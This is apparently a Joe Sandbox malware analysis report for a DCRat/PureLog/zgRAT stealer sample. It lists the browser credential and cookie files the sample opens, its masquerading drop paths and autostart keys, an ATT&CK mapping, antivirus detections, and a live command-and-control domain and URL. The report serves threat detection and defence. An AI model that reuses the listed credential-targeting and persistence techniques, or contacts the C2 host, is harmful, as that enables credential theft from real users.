                              Source: StartMenuExperienceHost.exe, 00000029.00000002.3272135764.00000000038AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: </div></div><div class="b"><div class="b-h">- - - # 03:04<span class="cp" onclick="e(this)">Copy</span></div><div class="b-b"><span class="c k">Win</span></div></div><div class="b"><div class="b-h">Program Manager # 03:04<span class="cp" onclick="e(this)">Copy</span></div><div class="b-b"><span class="c">r
                              Source: C:\Users\user\Desktop\lv961v43L3.exeQueries volume information: C:\Users\user\Desktop\lv961v43L3.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\lv961v43L3.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeQueries volume information: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe VolumeInformationJump to behavior
                              Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exeQueries volume information: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe VolumeInformationJump to behavior
                              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Users\user\Desktop\lv961v43L3.exeQueries volume information: C:\Users\user\Desktop\lv961v43L3.exe VolumeInformation
                              Source: C:\Users\user\Desktop\lv961v43L3.exeQueries volume information: C:\Users\user\Desktop\lv961v43L3.exe VolumeInformation
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe VolumeInformation
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe VolumeInformation
                              Source: C:\Users\Default\SystemSettings.exeQueries volume information: C:\Users\Default\SystemSettings.exe VolumeInformation
                              Source: C:\Users\Default\SystemSettings.exeQueries volume information: C:\Users\Default\SystemSettings.exe VolumeInformation
                              Source: C:\Users\user\Desktop\lv961v43L3.exeQueries volume information: C:\Users\user\Desktop\lv961v43L3.exe VolumeInformation
                              Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exeQueries volume information: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe VolumeInformation
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe VolumeInformation
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                              Source: C:\Users\Default\SystemSettings.exeQueries volume information: C:\Users\Default\SystemSettings.exe VolumeInformation
                              Source: C:\Users\user\Desktop\lv961v43L3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                              Stealing of Sensitive Information

                              barindex
                              Yara detected DCRat
                              Source: Yara matchFile source: 00000029.00000002.3272135764.00000000037B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000029.00000002.3272135764.0000000003B19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000029.00000002.3272135764.0000000003DD3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000029.00000002.3272135764.0000000003904000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000029.00000002.3272135764.00000000035B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.2085959223.0000000012641000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: lv961v43L3.exe PID: 180, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: apERZQztEJsqymITPFxguVe.exe PID: 4996, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: StartMenuExperienceHost.exe PID: 7724, type: MEMORYSTR
                              Yara detected PureLog Stealer
                              Source: Yara matchFile source: lv961v43L3.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.lv961v43L3.exe.40000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.2012463361.0000000000042000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: C:\Recovery\apERZQztEJsqymITPFxguVe.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Users\Default\SystemSettings.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe, type: DROPPED
                              Yara detected zgRAT
                              Source: Yara matchFile source: lv961v43L3.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.lv961v43L3.exe.40000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: C:\Recovery\apERZQztEJsqymITPFxguVe.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Users\Default\SystemSettings.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe, type: DROPPED
                              Tries to harvest and steal browser information (history, passwords, etc)
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
                              Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

                              Remote Access Functionality

                              barindex
                              Yara detected DCRat
                              Source: Yara matchFile source: 00000029.00000002.3272135764.00000000037B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000029.00000002.3272135764.0000000003B19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000029.00000002.3272135764.0000000003DD3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000029.00000002.3272135764.0000000003904000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000029.00000002.3272135764.00000000035B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.2085959223.0000000012641000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: lv961v43L3.exe PID: 180, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: apERZQztEJsqymITPFxguVe.exe PID: 4996, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: StartMenuExperienceHost.exe PID: 7724, type: MEMORYSTR
                              Yara detected PureLog Stealer
                              Source: Yara matchFile source: lv961v43L3.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.lv961v43L3.exe.40000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.2012463361.0000000000042000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: C:\Recovery\apERZQztEJsqymITPFxguVe.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Users\Default\SystemSettings.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe, type: DROPPED
                              Yara detected zgRAT
                              Source: Yara matchFile source: lv961v43L3.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.lv961v43L3.exe.40000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: C:\Recovery\apERZQztEJsqymITPFxguVe.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Users\Default\SystemSettings.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe, type: DROPPED

                              Mitre Att&ck Matrix

                              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                              Gather Victim Identity Information1
                              Scripting                              		Valid Accounts241
                              Windows Management Instrumentation                              		1
                              Scripting                              		1
                              DLL Side-Loading                              		1
                              Disable or Modify Tools                              		1
                              OS Credential Dumping                              		2
                              File and Directory Discovery                              		1
                              Taint Shared Content                              		11
                              Archive Collected Data                              		1
                              Encrypted Channel                              		Exfiltration Over Other Network MediumAbuse Accessibility Features
                              CredentialsDomainsDefault Accounts1
                              Scheduled Task/Job                              		1
                              DLL Side-Loading                              		12
                              Process Injection                              		1
                              Deobfuscate/Decode Files or Information                              		LSASS Memory135
                              System Information Discovery                              		Remote Desktop Protocol1
                              Data from Local System                              		2
                              Non-Application Layer Protocol                              		Exfiltration Over BluetoothNetwork Denial of Service
                              Email AddressesDNS ServerDomain AccountsAt1
                              Scheduled Task/Job                              		1
                              Scheduled Task/Job                              		1
                              Obfuscated Files or Information                              		Security Account Manager331
                              Security Software Discovery                              		SMB/Windows Admin Shares1
                              Clipboard Data                              		12
                              Application Layer Protocol                              		Automated ExfiltrationData Encrypted for Impact
                              Employee NamesVirtual Private ServerLocal AccountsCron31
                              Registry Run Keys / Startup Folder                              		31
                              Registry Run Keys / Startup Folder                              		1
                              Software Packing                              		NTDS2
                              Process Discovery                              		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                              DLL Side-Loading                              		LSA Secrets251
                              Virtualization/Sandbox Evasion                              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                              File Deletion                              		Cached Domain Credentials1
                              Application Window Discovery                              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items242
                              Masquerading                              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job251
                              Virtualization/Sandbox Evasion                              		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
                              Process Injection                              		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                              Behavior Graph

                              Hide Legend

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet
                              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1531317 Sample: lv961v43L3.exe Startdate: 11/10/2024 Architecture: WINDOWS Score: 100 65 863811cm.nyafka.top 2->65 69 Suricata IDS alerts for network traffic 2->69 71 Found malware configuration 2->71 73 Antivirus detection for dropped file 2->73 75 14 other signatures 2->75 8 lv961v43L3.exe 9 54 2->8         started        12 StartMenuExperienceHost.exe 2->12         started        15 StartMenuExperienceHost.exe 2->15         started        17 9 other processes 2->17 signatures3 process4 dnsIp5 49 C:\Windows\...\apERZQztEJsqymITPFxguVe.exe, PE32 8->49 dropped 51 C:\Windows\...\StartMenuExperienceHost.exe, PE32 8->51 dropped 53 C:\Windows\...\apERZQztEJsqymITPFxguVe.exe, PE32 8->53 dropped 61 27 other malicious files 8->61 dropped 79 Creates an undocumented autostart registry key 8->79 81 Creates multiple autostart registry keys 8->81 83 Drops PE files to the user root directory 8->83 97 3 other signatures 8->97 19 csc.exe 4 8->19         started        23 csc.exe 4 8->23         started        25 cmd.exe 8->25         started        27 18 other processes 8->27 67 863811cm.nyafka.top 188.114.96.3, 49760, 49766, 49772 CLOUDFLARENETUS European Union 12->67 55 C:\Users\user\Desktop\zpwiWXhy.log, PE32 12->55 dropped 57 C:\Users\user\Desktop\ysVaBXSD.log, PE32 12->57 dropped 59 C:\Users\user\Desktop\yHDAltbA.log, PE32 12->59 dropped 63 16 other malicious files 12->63 dropped 85 Tries to harvest and steal browser information (history, passwords, etc) 12->85 87 Multi AV Scanner detection for dropped file 15->87 89 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 15->89 91 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 15->91 93 Antivirus detection for dropped file 17->93 95 Machine Learning detection for dropped file 17->95 file6 signatures7 process8 file9 45 C:\Windows\...\SecurityHealthSystray.exe, PE32 19->45 dropped 77 Infects executable files (exe, dll, sys, html) 19->77 29 conhost.exe 19->29         started        31 cvtres.exe 1 19->31         started        47 C:\Program Files (x86)\...\msedge.exe, PE32 23->47 dropped 33 conhost.exe 23->33         started        35 cvtres.exe 1 23->35         started        37 conhost.exe 25->37         started        39 chcp.com 25->39         started        41 w32tm.exe 25->41         started        43 lv961v43L3.exe 25->43         started        signatures10 process11

                              Screenshots

                              Thumbnails

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                              windows-stand

                              Antivirus, Machine Learning and Genetic Malware Detection

                              Initial Sample

                              SourceDetectionScannerLabelLink
                              lv961v43L3.exe71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              lv961v43L3.exe100%AviraHEUR/AGEN.1329680
                              lv961v43L3.exe100%Joe Sandbox ML

                              Dropped Files

                              SourceDetectionScannerLabelLink
                              C:\Users\user\Desktop\DBipIDSx.log100%AviraTR/Agent.jbwuj
                              C:\Users\user\Desktop\QaswzdXY.log100%AviraHEUR/AGEN.1300079
                              C:\Users\user\Desktop\MnaxWgIk.log100%AviraTR/PSW.Agent.qngqt
                              C:\Users\Default\SystemSettings.exe100%AviraHEUR/AGEN.1329680
                              C:\Recovery\apERZQztEJsqymITPFxguVe.exe100%AviraHEUR/AGEN.1329680
                              C:\Users\user\Desktop\SzzvMtRI.log100%AviraTR/Agent.jbwuj
                              C:\Users\user\AppData\Local\Temp\rjP0QDXGdr.bat100%AviraBAT/Delbat.C
                              C:\Users\user\Desktop\BQDZBqHE.log100%Joe Sandbox ML
                              C:\Users\user\Desktop\QaswzdXY.log100%Joe Sandbox ML
                              C:\Users\user\Desktop\MnaxWgIk.log100%Joe Sandbox ML
                              C:\Users\Default\SystemSettings.exe100%Joe Sandbox ML
                              C:\Recovery\apERZQztEJsqymITPFxguVe.exe100%Joe Sandbox ML
                              C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe100%Joe Sandbox ML
                              C:\Users\user\Desktop\Gnkizmcn.log100%Joe Sandbox ML
                              C:\Recovery\apERZQztEJsqymITPFxguVe.exe71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Users\Default\SystemSettings.exe74%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Users\user\Desktop\BQDZBqHE.log8%ReversingLabs
                              C:\Users\user\Desktop\Babyelsr.log12%ReversingLabs
                              C:\Users\user\Desktop\CEHhnDDC.log12%ReversingLabs
                              C:\Users\user\Desktop\DBipIDSx.log50%ReversingLabsByteCode-MSIL.Trojan.Generic
                              C:\Users\user\Desktop\ExWQYAoA.log17%ReversingLabs
                              C:\Users\user\Desktop\Gnkizmcn.log17%ReversingLabs
                              C:\Users\user\Desktop\HkLqVmri.log29%ReversingLabsByteCode-MSIL.Trojan.Generic
                              C:\Users\user\Desktop\HrZgPASq.log17%ReversingLabs
                              C:\Users\user\Desktop\KdaYGjcg.log8%ReversingLabs
                              C:\Users\user\Desktop\KzWplSMm.log21%ReversingLabs
                              C:\Users\user\Desktop\LRfgsxYe.log29%ReversingLabs
                              C:\Users\user\Desktop\MnaxWgIk.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Users\user\Desktop\OpNfsPNf.log8%ReversingLabs
                              C:\Users\user\Desktop\QaswzdXY.log21%ReversingLabs
                              C:\Users\user\Desktop\SzzvMtRI.log50%ReversingLabsByteCode-MSIL.Trojan.Generic
                              C:\Users\user\Desktop\UQjmGZYR.log29%ReversingLabs
                              C:\Users\user\Desktop\XuBMTZHB.log5%ReversingLabs
                              C:\Users\user\Desktop\aBctEWCA.log29%ReversingLabsByteCode-MSIL.Trojan.Generic
                              C:\Users\user\Desktop\aJMMjFdF.log8%ReversingLabs
                              C:\Users\user\Desktop\blrDaWHv.log8%ReversingLabs
                              C:\Users\user\Desktop\ciTLwWWp.log8%ReversingLabs
                              C:\Users\user\Desktop\ekFuRFbl.log17%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                              C:\Users\user\Desktop\erTkMTCt.log8%ReversingLabs
                              C:\Users\user\Desktop\gBplMliu.log17%ReversingLabs
                              C:\Users\user\Desktop\jFctadEf.log17%ReversingLabs
                              C:\Users\user\Desktop\kTLTKyNc.log17%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Users\user\Desktop\kjvJoyHh.log13%ReversingLabsByteCode-MSIL.Trojan.Generic
                              C:\Users\user\Desktop\ksfcTiin.log8%ReversingLabs
                              C:\Users\user\Desktop\oTYKBhgS.log8%ReversingLabs
                              C:\Users\user\Desktop\pHdSnvcQ.log17%ReversingLabs
                              C:\Users\user\Desktop\rJPAIehM.log13%ReversingLabsByteCode-MSIL.Trojan.Generic
                              C:\Users\user\Desktop\sVoRDbyU.log17%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Users\user\Desktop\vzGrPbhF.log8%ReversingLabs
                              C:\Users\user\Desktop\xIFQfYNI.log5%ReversingLabs
                              C:\Users\user\Desktop\yGhYBYcD.log17%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                              C:\Users\user\Desktop\yHDAltbA.log21%ReversingLabs
                              C:\Users\user\Desktop\ysVaBXSD.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Users\user\Desktop\zpwiWXhy.log21%ReversingLabs
                              C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe74%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe74%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe74%ReversingLabsByteCode-MSIL.Trojan.DCRat

                              Unpacked PE Files

                              No Antivirus matches

                              Domains

                              No Antivirus matches

                              URLs

                              SourceDetectionScannerLabelLink
                              https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                              https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                              https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                              https://www.ecosia.org/newtab/0%URL Reputationsafe
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe

                              Domains and IPs

                              Contacted Domains

                              NameIPActiveMaliciousAntivirus DetectionReputation
                              863811cm.nyafka.top
                              		188.114.96.3
                              		truetrue
                                		unknown

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                http://863811cm.nyafka.top/video_RequestpacketUpdategeneratorPublic.phptrue
                                  		unknown

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://ac.ecosia.org/autocomplete?q=PElAqcNNWD.41.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://duckduckgo.com/chrome_newtabPElAqcNNWD.41.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://duckduckgo.com/ac/?q=PElAqcNNWD.41.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icoPElAqcNNWD.41.drfalse
                                    		unknown
                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchPElAqcNNWD.41.drfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=PElAqcNNWD.41.drfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=PElAqcNNWD.41.drfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://863811cm.nyafka.topStartMenuExperienceHost.exe, 00000029.00000002.3272135764.0000000003CC5000.00000004.00000800.00020000.00000000.sdmptrue
                                      		unknown
                                      https://www.ecosia.org/newtab/PElAqcNNWD.41.drfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namelv961v43L3.exe, 00000000.00000002.2080922506.0000000002DBD000.00000004.00000800.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000029.00000002.3272135764.00000000035B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=PElAqcNNWD.41.drfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://863811cm.nyafka.top/StartMenuExperienceHost.exe, 00000029.00000002.3272135764.00000000035B9000.00000004.00000800.00020000.00000000.sdmptrue
                                        		unknown

                                        World Map of Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public IPs

                                        IPDomainCountryFlagASNASN NameMalicious
                                        188.114.96.3
                                        		863811cm.nyafka.topEuropean Union
                                        		13335CLOUDFLARENETUStrue

                                        General Information

                                        Joe Sandbox version:41.0.0 Charoite
                                        Analysis ID:1531317
                                        Start date and time:2024-10-11 01:35:10 +02:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 10m 56s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:44
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:lv961v43L3.exe
                                        renamed because original name is a hash value
                                        Original Sample Name:76802a2f25a771332d8c00ee56975818.exe
                                        Detection:MAL
                                        Classification:mal100.spre.troj.spyw.expl.evad.winEXE@49/86@1/1
                                        EGA Information:
                                        • Successful, ratio: 7.7%
                                        HCA Information:Failed
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe

                                        Warnings

                                        • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe, svchost.exe
                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                        • Execution Graph export aborted for target StartMenuExperienceHost.exe, PID 6224 because it is empty
                                        • Execution Graph export aborted for target StartMenuExperienceHost.exe, PID 764 because it is empty
                                        • Execution Graph export aborted for target SystemSettings.exe, PID 1272 because it is empty
                                        • Execution Graph export aborted for target SystemSettings.exe, PID 2072 because it is empty
                                        • Execution Graph export aborted for target SystemSettings.exe, PID 8112 because it is empty
                                        • Execution Graph export aborted for target apERZQztEJsqymITPFxguVe.exe, PID 4996 because it is empty
                                        • Execution Graph export aborted for target apERZQztEJsqymITPFxguVe.exe, PID 6368 because it is empty
                                        • Execution Graph export aborted for target apERZQztEJsqymITPFxguVe.exe, PID 7452 because it is empty
                                        • Execution Graph export aborted for target lv961v43L3.exe, PID 180 because it is empty
                                        • Execution Graph export aborted for target lv961v43L3.exe, PID 5040 because it is empty
                                        • Execution Graph export aborted for target lv961v43L3.exe, PID 7268 because it is empty
                                        • Execution Graph export aborted for target lv961v43L3.exe, PID 940 because it is empty
                                        • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                        • Report size getting too big, too many NtOpenFile calls found.
                                        • Report size getting too big, too many NtOpenKey calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                        • VT rate limit hit for: lv961v43L3.exe

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
